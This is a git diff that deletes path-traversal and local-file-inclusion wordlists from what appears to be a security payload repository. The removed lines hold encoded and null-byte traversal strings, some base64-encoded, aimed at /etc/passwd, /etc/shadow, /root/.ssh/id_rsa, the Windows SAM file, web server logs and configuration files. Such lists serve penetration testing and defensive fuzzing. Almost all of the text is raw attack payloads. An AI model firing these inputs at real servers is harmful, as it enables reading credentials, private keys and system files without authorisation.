-..2fapache2flogs2ferror.log -..2fapache2flogs2faccess.log -..2f..2fapache2flogs2ferror.log -..2f..2fapache2flogs2faccess.log -..2f..2f..2fapache2flogs2ferror.log -..2f..2f..2fapache2flogs2faccess.log -..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log -..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log -..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log -..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log -..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log -..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log -..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log -..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log -..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log -..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log -..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log -..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og -..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log -..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log -..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log -..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log -..2fetc2fpasswd -..2fetc2fpasswd%00 -..2f..2fetc2fpasswd -..2f..2fetc2fpasswd%00 -..2f..2f..2fetc2fpasswd -..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 -..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 -L2V0Yy9tYXN0ZXIucGFzc3dk -L21hc3Rlci5wYXNzd2Q= -ZXRjL3Bhc3N3ZA== -ZXRjL3NoYWRvdyUwMA== -L2V0Yy9wYXNzd2Q= -L2V0Yy9wYXNzd2QlMDA= -Li4vZXRjL3Bhc3N3ZA== -Li4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== -Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== diff --git a/File Inclusion/Intruders/LFI-FD-check.txt b/File Inclusion/Intruders/LFI-FD-check.txt deleted file mode 100644 index 1d5fa62..0000000 --- a/File Inclusion/Intruders/LFI-FD-check.txt +++ /dev/null @@ -1,39 +0,0 @@ -/proc/self/cmdline -/proc/self/stat -/proc/self/status -/proc/self/fd/0 -/proc/self/fd/1 -/proc/self/fd/2 -/proc/self/fd/3 -/proc/self/fd/4 -/proc/self/fd/5 -/proc/self/fd/6 -/proc/self/fd/7 -/proc/self/fd/8 -/proc/self/fd/9 -/proc/self/fd/10 -/proc/self/fd/11 -/proc/self/fd/12 -/proc/self/fd/13 -/proc/self/fd/14 -/proc/self/fd/15 -/proc/self/fd/16 -/proc/self/fd/17 -/proc/self/fd/18 -/proc/self/fd/19 -/proc/self/fd/20 -/proc/self/fd/21 -/proc/self/fd/22 -/proc/self/fd/23 -/proc/self/fd/24 -/proc/self/fd/25 -/proc/self/fd/26 -/proc/self/fd/27 -/proc/self/fd/28 -/proc/self/fd/29 -/proc/self/fd/30 -/proc/self/fd/31 -/proc/self/fd/32 -/proc/self/fd/33 -/proc/self/fd/34 -/proc/self/fd/35 \ No newline at end of file diff --git a/File Inclusion/Intruders/LFI-WindowsFileCheck.txt b/File Inclusion/Intruders/LFI-WindowsFileCheck.txt deleted file mode 100644 index a56868a..0000000 --- a/File Inclusion/Intruders/LFI-WindowsFileCheck.txt +++ /dev/null @@ -1,69 +0,0 @@ -php://input -C:\boot.ini -C:\WINDOWS\win.ini -C:\WINDOWS\php.ini -C:\WINDOWS\System32\Config\SAM -C:\WINNT\php.ini -C:\xampp\phpMyAdmin\config.inc -C:\xampp\phpMyAdmin\phpinfo.php -C:\xampp\phpmyadmin\config.inc -C:\xampp\phpmyadmin\phpinfo.php -C:\xampp\phpmyadmin\config.inc.php -C:\xampp\phpMyAdmin\config.inc.php -C:\xampp\apache\conf\httpd.conf -C:\xampp\FileZillaFTP\FileZilla Server.xml -C:\xampp\MercuryMail\mercury.ini -C:\mysql\bin\my.ini -C:\xampp\php\php.ini -C:\xampp\phpMyAdmin\config.inc.php -C:\xampp\tomcat\conf\tomcat-users.xml -C:\xampp\tomcat\conf\web.xml -C:\xampp\sendmail\sendmail.ini -C:\xampp\webalizer\webalizer.conf -C:\xampp\webdav\webdav.txt -C:\xampp\apache\logs\error.log -C:\xampp\apache\logs\access.log -C:\xampp\FileZillaFTP\Logs -C:\xampp\FileZillaFTP\Logs\error.log -C:\xampp\FileZillaFTP\Logs\access.log -C:\xampp\MercuryMail\LOGS\error.log -C:\xampp\MercuryMail\LOGS\access.log -C:\xampp\mysql\data\mysql.err -C:\xampp\sendmail\sendmail.log -C:\apache\log\error.log -C:\apache\log\access.log -C:\apache\log\error_log -C:\apache\log\access_log -C:\apache2\log\error.log -C:\apache2\log\access.log -C:\apache2\log\error_log -C:\apache2\log\access_log -C:\log\error.log -C:\log\access.log -C:\log\error_log -C:\log\access_log -C:\apache\logs\error.log -C:\apache\logs\access.log -C:\apache\logs\error_log -C:\apache\logs\access_log -C:\apache2\logs\error.log -C:\apache2\logs\access.log -C:\apache2\logs\error_log -C:\apache2\logs\access_log -C:\logs\error.log -C:\logs\access.log -C:\logs\error_log -C:\logs\access_log -C:\log\httpd\access_log -C:\log\httpd\error_log -C:\logs\httpd\access_log -C:\logs\httpd\error_log -C:\opt\xampp\logs\access_log -C:\opt\xampp\logs\error_log -C:\opt\xampp\logs\access.log -C:\opt\xampp\logs\error.log -C:\Program Files\Apache Group\Apache\logs\access.log -C:\Program Files\Apache Group\Apache\logs\error.log -C:\Program Files\Apache Group\Apache\conf\httpd.conf -C:\Program Files\Apache Group\Apache2\conf\httpd.conf -C:\Program Files\xampp\apache\conf\httpd.conf diff --git a/File Inclusion/Intruders/Linux-files.txt b/File Inclusion/Intruders/Linux-files.txt deleted file mode 100644 index c43cc4a..0000000 --- a/File Inclusion/Intruders/Linux-files.txt +++ /dev/null @@ -1,62 +0,0 @@ -/etc/passwd -/etc/group -/etc/hosts -/etc/motd -/etc/issue -/etc/bashrc -/etc/apache2/apache2.conf -/etc/apache2/ports.conf -/etc/apache2/sites-available/default -/etc/httpd/conf/httpd.conf -/etc/httpd/conf.d -/etc/httpd/logs/access.log -/etc/httpd/logs/access_log -/etc/httpd/logs/error.log -/etc/httpd/logs/error_log -/etc/init.d/apache2 -/etc/mysql/my.cnf -/etc/nginx.conf -/opt/lampp/logs/access_log -/opt/lampp/logs/error_log -/opt/lamp/log/access_log -/opt/lamp/logs/error_log -/proc/self/environ -/proc/version -/proc/cmdline -/proc/mounts -/proc/config.gz -/root/.bashrc -/root/.bash_history -/root/.ssh/authorized_keys -/root/.ssh/id_rsa -/root/.ssh/id_rsa.keystore -/root/.ssh/id_rsa.pub -/root/.ssh/known_hosts -/usr/local/apache/htdocs/index.html -/usr/local/apache/conf/httpd.conf -/usr/local/apache/conf/extra/httpd-ssl.conf -/usr/local/apache/logs/error_log -/usr/local/apache/logs/access_log -/usr/local/apache/bin/apachectl -/usr/local/apache2/htdocs/index.html -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/conf/extra/httpd-ssl.conf -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/access_log -/usr/local/apache2/bin/apachectl -/usr/local/etc/nginx/nginx.conf -/usr/local/nginx/conf/nginx.conf -/var/apache/logs/access_log -/var/apache/logs/access.log -/var/apache/logs/error_log -/var/apache/logs/error.log -/var/log/apache/access.log -/var/log/apache/access_log -/var/log/apache/error.log -/var/log/apache/error_log -/var/log/httpd/error_log -/var/log/httpd/access_log -/var/log/nginx/access_log -/var/log/nginx/access.log -/var/log/nginx/error_log -/var/log/nginx/error.log \ No newline at end of file diff --git a/File Inclusion/Intruders/List_Of_File_To_Include.txt b/File Inclusion/Intruders/List_Of_File_To_Include.txt deleted file mode 100644 index 0ad6dcb..0000000 --- a/File Inclusion/Intruders/List_Of_File_To_Include.txt +++ /dev/null @@ -1,911 +0,0 @@ -\apache2\log\access_log -\apache2\log\access.log -\apache2\log\error_log -\apache2\log\error.log -/apache2/logs/access.log -/apache2/logs/access.log -\apache2\logs\access_log -\apache2\logs\access.log -/apache2/logs/access.log%00 -/apache2/logs/error.log -/apache2/logs/error.log -\apache2\logs\error_log -\apache2\logs\error.log -/apache2/logs/error.log%00 -\apache\log\access_log -\apache\log\access.log -\apache\log\error_log -\apache\log\error.log -/apache/logs/access.log -/apache/logs/access.log -/apache/logs/access.log -\apache\logs\access_log -\apache\logs\access.log -/apache/logs/access.log%00 -/apache/logs/error.log -/apache/logs/error.log -/apache/logs/error.log -\apache\logs\error_log -\apache\logs\error.log -/apache/logs/error.log%00 -/apache\php\php.ini -/apache\php\php.ini -/apache\php\php.ini%00 -/bin/php.ini -/bin/php.ini -/bin/php.ini%00 -c:\apache\php\php.ini -C:\apache\php\php.ini -C:\boot.ini -c:\home2\bin\stable\apache\php.ini -C:\home2\bin\stable\apache\php.ini -c:\home\bin\stable\apache\php.ini -C:\home\bin\stable\apache\php.ini -C:\MySQL\data\hostname.err -C:\MySQL\data\mysql-bin.log -C:\MySQL\data\mysql.err -C:\MySQL\data\mysql.log -C:\MySQL\my.cnf -C:\MySQL\my.ini -c:\NetServer\bin\stable\apache\php.ini -c:\php4\php.ini -C:\php4\php.ini -C:\php4\sessions\ -c:\php5\php.ini -C:\php5\php.ini -C:\php5\sessions\ -c:\php\php.ini -c:\PHP\php.ini -C:\php\php.ini -C:\php\sessions\ -C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf -C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf -C:\ProgramFiles\ApacheGroup\Apache\logs\access.log -C:\ProgramFiles\ApacheGroup\Apache\logs\error.log -C:\ProgramFiles\MySQL\data\hostname.err -C:\ProgramFiles\MySQL\data\mysql-bin.log -C:\ProgramFiles\MySQL\data\mysql.err -C:\ProgramFiles\MySQL\data\mysql.log -C:\ProgramFiles\MySQL\my.cnf -C:\ProgramFiles\MySQL\my.ini -C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err -C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log -C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err -C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log -C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf -C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini -C:\ProgramFiles\xampp\apache\conf\httpd.conf -c:\WINDOWS\php.ini -C:\WINDOWS\php.ini -C:\WINDOWS\Repair\SAM -C:\WINDOWS\TEMP\ -C:\WINDOWS\win.ini -c:\WINNT\php.ini -C:\WINNT\php.ini -C:\WINNT\win.ini -c:\xampp\apache\bin\php.ini -C:\xampp\apache\bin\php.ini -etc%2fpasswd -etc%2fpasswd%00 -etc%5cpasswd -etc%5cpasswd%00 -/etc/apache2/apache2.conf -/etc/apache2.conf -/etc/apache2/conf/httpd.conf -/etc/apache2/conf/httpd.conf -/etc/apache2/conf/httpd.conf%00 -/etc/apache2/httpd.conf -/etc/apache2/httpd.conf -/etc/apache2/httpd.conf%00 -/etc/apache2/sites-available/default -/etc/apache2/sites-enabled/000-default -/etc/apache/apache.conf -/etc/apache/conf/httpd.conf -/etc/apache/conf/httpd.conf -/etc/apache/conf/httpd.conf%00 -/etc/apache/httpd.conf -etc%c0%afpasswd -etc%c0%afpasswd%00 -/etc/chrootUsers -/etc/chrootUsers -/etc/chrootUsers%00 -/etc/crontab -/etc/fstab -/etc/ftpchroot -/etc/ftpchroot -/etc/ftpchroot%00 -/etc/ftphosts -/etc/ftphosts -/etc/ftphosts%00 -/etc/group -/etc/group -/etc/group%00 -/etc/hosts -/etc/http/conf/httpd.conf -/etc/http/conf/httpd.conf -/etc/http/conf/httpd.conf%00 -/etc/httpd.conf -/etc/httpd.conf -/etc/httpd.conf%00 -/etc/httpd/conf.d/php.conf -/etc/httpd/conf/httpd.conf -/etc/httpd/conf/httpd.conf -/etc/httpd/conf/httpd.conf%00 -/etc/httpd/httpd.conf -/etc/httpd/httpd.conf -/etc/httpd/httpd.conf%00 -/etc/httpd/logs/acces_log -/etc/httpd/logs/acces_log -/etc/httpd/logs/acces.log -/etc/httpd/logs/acces.log -/etc/httpd/logs/acces_log%00 -/etc/httpd/logs/acces.log%00 -/etc/httpd/logs/access_log -/etc/httpd/logs/access.log -/etc/httpd/logs/access.log -/etc/httpd/logs/error_log -/etc/httpd/logs/error_log -/etc/httpd/logs/error_log -/etc/httpd/logs/error.log -/etc/httpd/logs/error.log -/etc/httpd/logs/error_log%00 -/etc/httpd/logs/error.log%00 -/etc/httpd/php.ini -/etc/httpd/php.ini -/etc/httpd/php.ini%00 -/etc/http/httpd.conf -/etc/http/httpd.conf -/etc/http/httpd.conf%00 -/etc/inittab -/etc/issue -/etc/issue -/etc/logrotate.d/ftp -/etc/logrotate.d/ftp -/etc/logrotate.d/ftp%00 -/etc/logrotate.d/proftpd -/etc/logrotate.d/proftpd -/etc/logrotate.d/proftpd%00 -/etc/logrotate.d/vsftpd.log -/etc/logrotate.d/vsftpd.log -/etc/logrotate.d/vsftpd.log%00 -/etc/master.passwd -/etc/motd -/etc/motd -/etc/my.cnf -/etc/my.cnf -/etc/my.cnf%00 -/etc/mysql/my.cnf -/etc/mysql/my.cnf -/etc/mysql/my.cnf%00 -/etc/nginx.conf -/etc/nginx/nginx.conf -/etc/nginx/sites-available/default -/etc/nginx/sites-enabled/default -/etc/pam.d/proftpd -/..\..\\..\..\\..\..\\..\..\\\/etc/passwd -/etc/passwd -/etc/passwd -/etc/passwd%00 -etc/passwd%00 -/etc/php4.4/fcgi/php.ini -/etc/php4.4/fcgi/php.ini -/etc/php4.4/fcgi/php.ini%00 -/etc/php4/apache2/php.ini -/etc/php4/apache2/php.ini -/etc/php4/apache2/php.ini%00 -/etc/php4/apache/php.ini -/etc/php4/apache/php.ini -/etc/php4/apache/php.ini%00 -/etc/php4/cgi/php.ini -/etc/php4/cgi/php.ini -/etc/php4/cgi/php.ini%00 -/etc/php5/apache2/php.ini -/etc/php5/apache2/php.ini -/etc/php5/apache2/php.ini%00 -/etc/php5/apache/php.ini -/etc/php5/apache/php.ini -/etc/php5/apache/php.ini%00 -/etc/php5/cgi/php.ini -/etc/php5/cgi/php.ini -/etc/php5/cgi/php.ini%00 -/etc/php/apache2/php.ini -/etc/php/apache2/php.ini -/etc/php/apache2/php.ini%00 -/etc/php/apache/php.ini -/etc/php/apache/php.ini -/etc/php/apache/php.ini%00 -/etc/php/cgi/php.ini -/etc/php/cgi/php.ini -/etc/php/cgi/php.ini%00 -/etc/php.ini -/etc/php.ini -/etc/php.ini%00 -/etc/phpmyadmin/config.inc.php -/etc/php/php4/php.ini -/etc/php/php4/php.ini -/etc/php/php4/php.ini%00 -/etc/php/php.ini -/etc/php/php.ini -/etc/php/php.ini%00 -/etc/proftp.conf -/etc/proftp.conf -/etc/proftp.conf%00 -/etc/proftpd/modules.conf -/etc/proftpd/modules.conf -/etc/proftpd/modules.conf%00 -/etc/protpd/proftpd.conf -/etc/protpd/proftpd.conf -/etc/protpd/proftpd.conf%00 -/etc/pure-ftpd.conf -/etc/pure-ftpd.conf -/etc/pure-ftpd.conf%00 -/etc/pureftpd.passwd -/etc/pureftpd.passwd -/etc/pureftpd.passwd%00 -/etc/pureftpd.pdb -/etc/pureftpd.pdb -/etc/pureftpd.pdb%00 -/etc/pure-ftpd/pure-ftpd.conf -/etc/pure-ftpd/pure-ftpd.conf -/etc/pure-ftpd/pure-ftpd.conf%00 -/etc/pure-ftpd/pure-ftpd.pdb -/etc/pure-ftpd/pure-ftpd.pdb -/etc/pure-ftpd/pureftpd.pdb -/etc/pure-ftpd/pureftpd.pdb -/etc/pure-ftpd/pure-ftpd.pdb%00 -/etc/pure-ftpd/pureftpd.pdb%00 -/etc/redhat-release -/etc/release -/etc/security/environ -/etc/security/environ -/etc/security/environ%00 -/etc/security/group -/etc/security/group -/etc/security/group%00 -/etc/security/limits -/etc/security/limits -/etc/security/limits%00 -/etc/security/passwd -/etc/security/passwd -/etc/security/passwd%00 -/etc/security/user -/etc/security/user -/etc/security/user%00 -/etc/shadow -/etc/shadow~ -/etc/shadow -/etc/shadow%00 -/etc/ssh/sshd_config -/etc/sysconfig/network-scripts/ifcfg-eth0 -/etc/vhcs2/proftpd/proftpd.conf -/etc/vhcs2/proftpd/proftpd.conf -/etc/vhcs2/proftpd/proftpd.conf%00 -/etc/vsftpd.chroot_list -/etc/vsftpd.chroot_list -/etc/vsftpd.chroot_list%00 -/etc/vsftpd.conf -/etc/vsftpd.conf -/etc/vsftpd.conf%00 -/etc/vsftpd/vsftpd.conf -/etc/vsftpd/vsftpd.conf -/etc/vsftpd/vsftpd.conf%00 -/etc/wu-ftpd/ftpaccess -/etc/wu-ftpd/ftpaccess -/etc/wu-ftpd/ftpaccess%00 -/etc/wu-ftpd/ftphosts -/etc/wu-ftpd/ftphosts -/etc/wu-ftpd/ftphosts%00 -/etc/wu-ftpd/ftpusers -/etc/wu-ftpd/ftpusers -/etc/wu-ftpd/ftpusers%00 -/home2\bin\stable\apache\php.ini -/home2\bin\stable\apache\php.ini -/home2\bin\stable\apache\php.ini%00 -/home\bin\stable\apache\php.ini -/home\bin\stable\apache\php.ini -/home\bin\stable\apache\php.ini%00 -\log\access_log -\log\access.log -\log\error_log -\log\error.log -\log\httpd\access_log -\log\httpd\error_log -/logs/access_log -/logs/access_log -/logs/access.log -/logs/access.log -\logs\access_log -\logs\access.log -/logs/access.log%00 -/logs/error_log -/logs/error_log -/logs/error.log -/logs/error.log -\logs\error_log -\logs\error.log -/logs/error.log%00 -\logs\httpd\access_log -\logs\httpd\error_log -/logs/pure-ftpd.log -/logs/pure-ftpd.log -/logs/pure-ftpd.log%00 -\mysql\bin\my.ini -/NetServer\bin\stable\apache\php.ini -/NetServer\bin\stable\apache\php.ini -/NetServer\bin\stable\apache\php.ini%00 -/opt/apache2/conf/httpd.conf -/opt/apache2/conf/httpd.conf -/opt/apache2/conf/httpd.conf%00 -/opt/apache/conf/httpd.conf -/opt/apache/conf/httpd.conf -/opt/apache/conf/httpd.conf%00 -/opt/lampp/logs/access_log -/opt/lampp/logs/access_log -/opt/lampp/logs/access.log -/opt/lampp/logs/access.log -/opt/lampp/logs/access_log%00 -/opt/lampp/logs/access.log%00 -/opt/lampp/logs/error_log -/opt/lampp/logs/error_log -/opt/lampp/logs/error.log -/opt/lampp/logs/error.log -/opt/lampp/logs/error_log%00 -/opt/lampp/logs/error.log%00 -/opt/xampp/etc/php.ini -/opt/xampp/etc/php.ini -/opt/xampp/etc/php.ini%00 -/opt/xampp/logs/access_log -/opt/xampp/logs/access_log -/opt/xampp/logs/access.log -/opt/xampp/logs/access.log -\opt\xampp\logs\access_log -\opt\xampp\logs\access.log -/opt/xampp/logs/access_log%00 -/opt/xampp/logs/access.log%00 -/opt/xampp/logs/error_log -/opt/xampp/logs/error_log -/opt/xampp/logs/error.log -/opt/xampp/logs/error.log -\opt\xampp\logs\error_log -\opt\xampp\logs\error.log -/opt/xampp/logs/error_log%00 -/opt/xampp/logs/error.log%00 -/php4\php.ini -/php4\php.ini -/php4\php.ini%00 -/php5\php.ini -/php5\php.ini -/php5\php.ini%00 -php://input -/php\php.ini -/php\php.ini -/PHP\php.ini -/PHP\php.ini -/php\php.ini%00 -/PHP\php.ini%00 -/private/etc/httpd/httpd.conf -/private/etc/httpd/httpd.conf 